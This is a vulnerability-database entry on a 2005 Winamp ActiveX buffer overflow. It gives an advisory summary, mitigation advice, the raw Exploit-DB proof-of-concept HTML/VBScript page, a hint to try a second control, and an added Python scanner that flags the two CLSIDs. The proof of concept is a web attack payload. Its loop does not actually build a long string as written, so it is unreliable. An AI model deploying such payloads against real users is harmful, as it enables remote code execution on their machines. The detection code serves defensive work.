Vendor: Winamp
By: SecurityFocus
CVSS: 9.3 (HIGH)
Type: Buffer Overflow
CWE: 119
Product Name: Winamp
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Nullsoft Winamp ActiveX Control Remote Buffer Overflow Vulnerability

Nullsoft Winamp ActiveX Control is alleged to be prone to a remote buffer overflow vulnerability. This issue presents itself in an ActiveX control installed by the application. Reportedly, a malicious attacker can exploit this issue to execute arbitrary code. An attacker can exploit this issue by enticing a victim to view a malicious HTML document containing a malicious script that will overflow the buffer. This can be done by sending the malicious HTML document as an email attachment or by hosting it on a malicious website.

Mitigation:

Users should exercise caution when handling HTML documents from untrusted sources. It is also recommended that users disable ActiveX controls in their web browsers.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11107/info

Nullsoft Winamp ActiveX Control is alleged to be prone to a remote buffer overflow vulnerability. This issue presents itself in an ActiveX control installed by the application. Reportedly, a malicious attacker can exploit this issue to execute arbitrary code.

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=Kylie height=250 hspace=20 width=250 align=left classid=clsid:FA3662C3-B8E8-11D6-A667-0010B556D978>
<PARAM NAME="Initialize" VALUE="">
</OBJECT>
<SCRIPT language=vbscript>

dim xint
dim haveIgotthebestbumorwhat
for xint = 1 to 5000
haveIgotthebestbumorwhat = foo & "K"
next
Kylie.AppendFileToPlayList haveIgotthebestbumorwhat

</SCRIPT>
</BODY></HTML>

If you're bored could also try -

CoAxTrack Class - {B9F3009B-976B-41C4-A992-229DCCF3367C}.
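
A defender-side check for the pattern in the entry above, as an added example that is not part of the original advisory or the Exploit-DB entry: it scans an HTML document (for instance a mail attachment or a proxied page) for OBJECT tags whose classid matches the two CLSIDs named on this page. The function names, the watchlist labels and the sample document are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSIDs named on this page; the labels are descriptive text added here.
WATCHLIST = {
    "FA3662C3-B8E8-11D6-A667-0010B556D978": "control instantiated in the PoC",
    "B9F3009B-976B-41C4-A992-229DCCF3367C": "CoAxTrack Class",
}
GUID = re.compile(r"[0-9A-F]{8}(-[0-9A-F]{4}){3}-[0-9A-F]{12}")

def normalize_clsid(value):
    """Reduce 'clsid:{GUID}', 'CLSID:GUID' or a bare GUID to upper-case GUID text."""
    v = re.sub(r"\s+", "", value or "").upper()
    v = re.sub(r"^CLSID:", "", v).strip("{}")
    return v if GUID.fullmatch(v) else None

class ObjectTagScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":  # the parser lower-cases tag and attribute names
            return
        for i, (name, value) in enumerate(attrs):
            if name != "classid":
                continue
            clsid = normalize_clsid(value)
            # An unquoted value wrapped across lines is split by the parser:
            # the tail arrives as the next, valueless attribute. Rejoin it.
            if clsid is None and i + 1 < len(attrs) and attrs[i + 1][1] is None:
                clsid = normalize_clsid((value or "") + attrs[i + 1][0])
            if clsid in WATCHLIST:
                self.hits.append({"clsid": clsid, "id": dict(attrs).get("id"),
                                  "line": self.getpos()[0], "label": WATCHLIST[clsid]})

def scan_html(text):
    scanner = ObjectTagScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.hits

# Constructed sample: wrapped unquoted classid, braced lower-case form, unrelated GUID.
SAMPLE = """<html><body>
<OBJECT id=a classid=clsid:FA3662C3-
B8E8-11D6-A667-0010B556D978></OBJECT>
<object id="b" classid="CLSID:{b9f3009b-976b-41c4-a992-229dccf3367c}"></object>
<object id="c" classid="clsid:11111111-2222-3333-4444-555555555555"></object>
</body></html>"""
```

`scan_html(SAMPLE)` returns one hit per watchlisted OBJECT tag, with the element id and the line where the tag starts, so a mail or proxy filter can quarantine the document or raise an alert.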